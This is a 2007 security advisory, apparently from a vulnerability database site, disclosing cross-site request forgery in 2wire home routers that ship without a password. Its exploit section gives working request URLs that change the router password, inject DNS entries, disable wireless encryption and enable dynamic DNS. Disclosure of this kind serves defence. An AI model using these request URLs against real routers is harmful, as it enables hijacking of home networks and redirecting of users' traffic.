Cross Site Request Forgery in 2wire routers

2007.08.20
Credit: hkm
Risk: High
Local: No
Remote: Yes
CWE: N/A

Cross Site Request Forgery in 2wire routers Vulnerable Routers: 1701HG, 2071 Gateway Software: v3.17.5, 5.29.51 Password Not Set (default) Greetz a la Comunidad Underground de Mxico, y a los que me ayudaron a probarlo: Preth00nker, nitr0us, ... hkm (at) hakim (dot) ws [email concealed] I. Background ------------- This is the most popular router in Mexico and the default installation from the ISP has no system password. II. Vuln ---------------- It is possible to send a request to the router that will modify its configuration. It does not validate POST, or Referer or Anything... II. Exploit ---------------- We just need the client to do a request to the router with the configuration we desire. [examples] Set a password (NUEVOPASS): http://192.168.1.254/xslt?PAGE=A05_POST&THISPAGE=A05&NEXTPAGE=A05_POST&E NABLE_PASS=on&PASSWORD=NUEVOPASS&PASSWORD_CONF=NUEVOPASS Add names to the DNS (216.163.137.3 www.prueba.hkm): http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAM E=www.prueba.hkm&ADDR=216.163.137.3 Disable Wireless Authentication http://192.168.1.254/xslt?PAGE=C05_POST&THISPAGE=C05&NEXTPAGE=C05_POST&N AME=encrypt_enabled&VALUE=0 Set Dynamic DNS http://192.168.1.254/xslt?PAGE=J05_POST&THISPAGE=J05&NEXTPAGE=J05_POST&I P_DYNAMIC=TRUE Disable the Firewall Reset the device Etc... DNS Poisoning demo: http://www.hakim.ws/2wire/demodns.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top